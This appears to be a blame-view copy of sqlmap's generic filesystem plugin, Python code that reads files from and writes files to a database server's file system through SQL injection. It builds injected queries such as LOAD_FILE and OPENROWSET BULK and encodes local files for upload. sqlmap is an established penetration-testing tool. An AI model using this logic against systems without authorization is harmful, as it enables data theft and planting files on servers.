sqlmap/plugins/generic/filesystem.py

325 lines
12 KiB
Python
Raw Normal View History

2019-05-08 13:47:52 +03:00
#!/usr/bin/env python
2008-10-15 19:38:22 +04:00
"""
2023-01-03 01:24:59 +03:00
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
2017-10-11 15:50:46 +03:00
See the file 'LICENSE' for copying permission
2008-10-15 19:38:22 +04:00
"""
2019-05-03 14:48:41 +03:00
import codecs
import os
2015-07-26 17:34:11 +03:00
import sys
from lib.core.agent import agent
from lib.core.common import Backend
2014-12-02 12:29:09 +03:00
from lib.core.common import checkFile
2019-06-04 15:44:06 +03:00
from lib.core.common import dataToOutFile
2013-01-08 13:23:02 +04:00
from lib.core.common import decloakToTemp
2019-05-03 14:20:15 +03:00
from lib.core.common import decodeDbmsHexValue
2012-06-14 17:38:53 +04:00
from lib.core.common import isListLike
2019-06-04 15:44:06 +03:00
from lib.core.common import isNumPosStrValue
from lib.core.common import isStackingAvailable
2010-12-18 18:57:47 +03:00
from lib.core.common import isTechniqueAvailable
from lib.core.common import readInput
2019-03-28 18:04:38 +03:00
from lib.core.compat import xrange
2019-07-12 13:18:56 +03:00
from lib.core.convert import encodeBase64
from lib.core.convert import encodeHex
2019-05-03 14:48:41 +03:00
from lib.core.convert import getText
2019-05-06 01:54:21 +03:00
from lib.core.convert import getUnicode
from lib.core.data import conf
2012-07-06 16:24:44 +04:00
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import CHARSET_TYPE
2019-06-04 15:44:06 +03:00
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
2010-12-18 18:57:47 +03:00
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapUndefinedMethod
2016-06-19 18:44:47 +03:00
from lib.core.settings import UNICODE_ENCODING
from lib.request import inject
2008-10-15 19:38:22 +04:00
2019-05-29 17:42:04 +03:00
class Filesystem(object):
2008-10-15 19:38:22 +04:00
"""
This class defines generic OS file system functionalities for plugins.
"""
def __init__(self):
2019-08-13 16:22:02 +03:00
self.fileTblName = "%sfile" % conf.tablePrefix
2011-04-30 17:20:05 +04:00
self.tblField = "data"
def _checkFileLength(self, localFile, remoteFile, fileRead=False):
if Backend.isDbms(DBMS.MYSQL):
lengthQuery = "LENGTH(LOAD_FILE('%s'))" % remoteFile
2013-01-14 17:43:03 +04:00
elif Backend.isDbms(DBMS.PGSQL) and not fileRead:
2015-07-24 15:56:45 +03:00
lengthQuery = "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid
elif Backend.isDbms(DBMS.MSSQL):
2013-01-07 19:36:29 +04:00
self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)")
inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField))
lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName)
2015-11-20 19:01:41 +03:00
try:
localFileSize = os.path.getsize(localFile)
except OSError:
warnMsg = "file '%s' is missing" % localFile
logger.warning(warnMsg)
2015-11-20 19:01:41 +03:00
localFileSize = 0
if fileRead and Backend.isDbms(DBMS.PGSQL):
2015-09-03 11:19:59 +03:00
logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile)
sameFile = True
else:
2015-09-03 11:19:59 +03:00
logger.debug("checking the length of the remote file '%s'" % remoteFile)
remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
sameFile = None
if isNumPosStrValue(remoteFileSize):
2019-03-28 17:14:16 +03:00
remoteFileSize = int(remoteFileSize)
2016-06-19 18:44:47 +03:00
localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
sameFile = False
if localFileSize == remoteFileSize:
sameFile = True
2015-09-03 11:19:59 +03:00
infoMsg = "the local file '%s' and the remote file " % localFile
2015-09-03 11:32:22 +03:00
infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize)
elif remoteFileSize > localFileSize:
2015-09-03 11:32:22 +03:00
infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize)
2015-09-03 11:19:59 +03:00
infoMsg += "the local file '%s' (%dB)" % (localFile, localFileSize)
else:
2015-09-03 11:32:22 +03:00
infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize)
infoMsg += "file '%s' (%d B)" % (localFile, localFileSize)
logger.info(infoMsg)
else:
sameFile = False
2014-08-21 02:32:15 +04:00
warnMsg = "it looks like the file has not been written (usually "
2016-05-24 13:30:01 +03:00
warnMsg += "occurs if the DBMS process user has no write "
2014-08-21 02:32:15 +04:00
warnMsg += "privileges in the destination path)"
logger.warning(warnMsg)
return sameFile
def fileToSqlQueries(self, fcEncodedList):
"""
Called by MySQL and PostgreSQL plugins to write a file on the
back-end DBMS underlying file system
"""
2011-04-30 17:20:05 +04:00
counter = 0
sqlQueries = []
for fcEncodedLine in fcEncodedList:
if counter == 0:
sqlQueries.append("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, fcEncodedLine))
else:
2013-01-08 13:55:25 +04:00
updatedField = agent.simpleConcatenate(self.tblField, fcEncodedLine)
sqlQueries.append("UPDATE %s SET %s=%s" % (self.fileTblName, self.tblField, updatedField))
counter += 1
return sqlQueries
2015-07-24 15:56:45 +03:00
def fileEncode(self, fileName, encoding, single, chunkSize=256):
"""
Called by MySQL and PostgreSQL plugins to write a file on the
back-end DBMS underlying file system
"""
2017-01-31 16:00:12 +03:00
checkFile(fileName)
2012-12-23 22:34:35 +04:00
with open(fileName, "rb") as f:
2015-07-24 15:56:45 +03:00
content = f.read()
return self.fileContentEncode(content, encoding, single, chunkSize)
def fileContentEncode(self, content, encoding, single, chunkSize=256):
retVal = []
2019-07-12 13:18:56 +03:00
if encoding == "hex":
content = encodeHex(content)
elif encoding == "base64":
content = encodeBase64(content)
else:
content = codecs.encode(content, encoding)
content = getText(content).replace("\n", "")
if not single:
2015-07-24 15:56:45 +03:00
if len(content) > chunkSize:
for i in xrange(0, len(content), chunkSize):
_ = content[i:i + chunkSize]
if encoding == "hex":
2012-07-24 16:35:56 +04:00
_ = "0x%s" % _
elif encoding == "base64":
_ = "'%s'" % _
2012-07-24 16:35:56 +04:00
retVal.append(_)
2012-07-24 16:35:56 +04:00
if not retVal:
if encoding == "hex":
2012-07-24 16:35:56 +04:00
content = "0x%s" % content
elif encoding == "base64":
2012-07-24 16:35:56 +04:00
content = "'%s'" % content
2013-01-10 14:54:07 +04:00
retVal = [content]
2012-07-24 16:35:56 +04:00
return retVal
2013-01-23 05:27:01 +04:00
def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False):
2017-04-18 16:48:05 +03:00
choice = None
2013-01-23 06:10:38 +04:00
2013-01-23 05:27:01 +04:00
if forceCheck is not True:
message = "do you want confirmation that the local file '%s' " % localFile
message += "has been successfully written on the back-end DBMS "
2015-09-03 11:19:59 +03:00
message += "file system ('%s')? [Y/n] " % remoteFile
2017-04-18 16:48:05 +03:00
choice = readInput(message, default='Y', boolean=True)
2017-04-18 16:48:05 +03:00
if forceCheck or choice:
return self._checkFileLength(localFile, remoteFile)
return True
def askCheckReadFile(self, localFile, remoteFile):
2019-06-27 18:28:43 +03:00
if not kb.bruteMode:
message = "do you want confirmation that the remote file '%s' " % remoteFile
message += "has been successfully downloaded from the back-end "
message += "DBMS file system? [Y/n] "
2019-06-27 18:28:43 +03:00
if readInput(message, default='Y', boolean=True):
return self._checkFileLength(localFile, remoteFile, True)
return None
def nonStackedReadFile(self, remoteFile):
2012-07-06 18:13:50 +04:00
errMsg = "'nonStackedReadFile' method must be defined "
errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg)
def stackedReadFile(self, remoteFile):
2011-04-30 17:20:05 +04:00
errMsg = "'stackedReadFile' method must be defined "
errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg)
def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
2011-04-30 17:20:05 +04:00
errMsg = "'unionWriteFile' method must be defined "
errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg)
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
2011-04-30 17:20:05 +04:00
errMsg = "'stackedWriteFile' method must be defined "
errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg)
2019-06-03 11:41:51 +03:00
def readFile(self, remoteFile):
2012-12-19 18:12:09 +04:00
localFilePaths = []
self.checkDbmsOs()
2019-06-03 11:41:51 +03:00
for remoteFile in remoteFile.split(','):
2012-12-19 18:12:09 +04:00
fileContent = None
kb.fileReadMode = True
2012-07-06 16:24:44 +04:00
if conf.direct or isStackingAvailable():
if isStackingAvailable():
2023-04-11 15:19:39 +03:00
debugMsg = "going to try to read the file with stacked query SQL "
debugMsg += "injection technique"
logger.debug(debugMsg)
fileContent = self.stackedReadFile(remoteFile)
elif Backend.isDbms(DBMS.MYSQL):
2023-04-11 15:19:39 +03:00
debugMsg = "going to try to read the file with non-stacked query "
debugMsg += "SQL injection technique"
logger.debug(debugMsg)
fileContent = self.nonStackedReadFile(remoteFile)
else:
errMsg = "none of the SQL injection techniques detected can "
errMsg += "be used to read files from the underlying file "
errMsg += "system of the back-end %s server" % Backend.getDbms()
logger.error(errMsg)
2012-07-06 18:13:50 +04:00
2012-12-19 18:12:09 +04:00
fileContent = None
kb.fileReadMode = False
if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL):
self.cleanup(onlyFileTbl=True)
elif isListLike(fileContent):
newFileContent = ""
for chunk in fileContent:
if isListLike(chunk):
if len(chunk) > 0:
chunk = chunk[0]
else:
chunk = ""
if chunk:
newFileContent += chunk
fileContent = newFileContent
2012-12-19 18:12:09 +04:00
if fileContent is not None:
2019-05-03 14:20:15 +03:00
fileContent = decodeDbmsHexValue(fileContent, True)
2019-06-27 18:28:43 +03:00
if fileContent.strip():
localFilePath = dataToOutFile(remoteFile, fileContent)
if not Backend.isDbms(DBMS.PGSQL):
self.cleanup(onlyFileTbl=True)
sameFile = self.askCheckReadFile(localFilePath, remoteFile)
if sameFile is True:
localFilePath += " (same file)"
elif sameFile is False:
localFilePath += " (size differs from remote file)"
localFilePaths.append(localFilePath)
2019-06-27 18:28:43 +03:00
elif not kb.bruteMode:
errMsg = "no data retrieved"
logger.error(errMsg)
2012-12-19 18:12:09 +04:00
return localFilePaths
2013-01-23 05:27:01 +04:00
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
written = False
2014-12-02 12:29:09 +03:00
checkFile(localFile)
self.checkDbmsOs()
2013-01-08 13:23:02 +04:00
if localFile.endswith('_'):
2017-11-15 11:51:20 +03:00
localFile = getUnicode(decloakToTemp(localFile))
2013-01-07 18:55:40 +04:00
if conf.direct or isStackingAvailable():
if isStackingAvailable():
2015-09-03 11:19:59 +03:00
debugMsg = "going to upload the file '%s' with " % fileType
2018-09-06 01:59:29 +03:00
debugMsg += "stacked query technique"
logger.debug(debugMsg)
2008-10-15 19:38:22 +04:00
2013-01-23 05:27:01 +04:00
written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck)
self.cleanup(onlyFileTbl=True)
elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL):
2015-09-03 11:19:59 +03:00
debugMsg = "going to upload the file '%s' with " % fileType
2018-09-06 01:59:29 +03:00
debugMsg += "UNION query technique"
logger.debug(debugMsg)
2008-10-15 19:38:22 +04:00
2013-01-23 06:10:38 +04:00
written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck)
2018-09-06 01:59:29 +03:00
elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to upload the file '%s' with " % fileType
debugMsg += "LINES TERMINATED BY technique"
logger.debug(debugMsg)
written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck)
else:
errMsg = "none of the SQL injection techniques detected can "
2011-02-06 18:28:23 +03:00
errMsg += "be used to write files to the underlying file "
errMsg += "system of the back-end %s server" % Backend.getDbms()
logger.error(errMsg)
return None
2013-01-23 05:27:01 +04:00
return written